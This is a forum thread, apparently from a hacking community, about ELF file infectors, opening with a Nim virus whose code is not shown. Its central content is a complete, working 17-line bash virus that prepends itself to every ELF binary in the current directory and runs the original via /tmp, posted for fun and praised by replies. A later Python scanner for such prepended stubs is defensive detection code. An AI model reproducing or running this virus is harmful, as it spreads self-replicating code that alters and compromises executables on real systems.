Linux.Cephei: a Nim virus


#1

This is an ELF infector I wrote while learning NimLang :)


#2

I think you might have forgotten something here.


#3

yeah fixed… my clipboard has tricked me!


#4

Why Nim if I may ask?


#6

No specific reason, I like writing prependers in languages where they don’t exist and that I find interesting. Nim got my attention.


#8

Cool.

Your post would have much more value if you could explain the whys and hows behind your code. Although @0x00pf has already made a write-up on ELF infectors, don’t hesitate to give us your own viewpoint. Otherwise your post is nothing more than self-advertisement and, fortunately or unfortunately, this site isn’t aimed at that.

I hope you understand,

Cheers!


#10

Sure, no problems with that :) Will try to do more than copying and pasting from my website, should be cool.


(pico) #11

For the LuLZ :)
This is a 17 LoC, multi-architecture virus (works on x86 -32/64bits-, ARM, MIPS, PowerPC,…). It increases the infected binary by less than 350 bytes!!!

Feel the power of Bash!
Best language ever for virus development!!

#!/bin/bash
#AMiINFECTED

for f in *; do
        if [ ! -z `file $f|grep ELF|cut -d : -f 1` ]; then
                if [ -z `grep -a AMiNFECTED $f|head -n 1` ]; then
                        cp $f .b&&head -n 17 $0>.b&&cat $f>>.b&&mv .b $f
                fi
        fi
done

rm -f /tmp/.a&&tail -n +18 $0>/tmp/.a
if [ -s /tmp/.a ]; then
        echo "I'm an awesome bash virus"
        chmod +x /tmp/.a&&/tmp/.a
fi
exit
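
From the defender's side, the file layout the script above produces (a `#!` stub with the original ELF image starting on a later line) can be detected statically. The following is an added example, not part of the original post; the function names, the 64 KiB stub limit and the scan of the current directory are assumptions made for illustration.

```python
import os
from typing import Iterator, Optional, Tuple

ELF_MAGIC = b"\x7fELF"
MAX_STUB = 64 * 1024  # assumed upper bound on the size of a script stub


def plausible_elf_ident(ident: bytes) -> bool:
    """Validate e_ident past the magic so stray magic bytes in text are not flagged."""
    return (len(ident) >= 7 and ident[:4] == ELF_MAGIC
            and ident[4] in (1, 2)   # EI_CLASS: ELFCLASS32 / ELFCLASS64
            and ident[5] in (1, 2)   # EI_DATA: little / big endian
            and ident[6] == 1)       # EI_VERSION: EV_CURRENT


def find_prepended_elf(data: bytes) -> Optional[Tuple[int, int]]:
    """Return (elf_offset, stub_lines) for a '#!' stub followed by an ELF image."""
    if not data.startswith(b"#!"):
        return None
    pos = data.find(b"\n" + ELF_MAGIC, 0, MAX_STUB)
    while pos != -1:
        start = pos + 1  # the ELF image begins right after the newline
        if plausible_elf_ident(data[start:start + 7]):
            return start, data.count(b"\n", 0, start)
        pos = data.find(b"\n" + ELF_MAGIC, start, MAX_STUB)
    return None


def scan_dir(root: str) -> Iterator[Tuple[str, int, int]]:
    """Yield (path, elf_offset, stub_lines) for every suspicious regular file."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_STUB + 16)
            except OSError:
                continue
            hit = find_prepended_elf(data)
            if hit:
                yield (path, *hit)


if __name__ == "__main__":
    for path, offset, lines in scan_dir("."):
        print(f"{path}: ELF image at byte {offset} after a {lines}-line script stub")
```

Any legitimate shell-wrapped binary with the same layout also matches, so hits are leads to triage rather than verdicts.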


(Command-Line Ninja) #12

I must say, this is the coolest thing I have ever seen.

An ELF file injector in bash. I feel as if this needs its own topic. I have to share this nonetheless.

Mind == Blown.


(pico) #13

@pry0cc, you really have to check this… code injection using ROP without ptrace from BASH!

Do not underestimate the power of the shell!! :)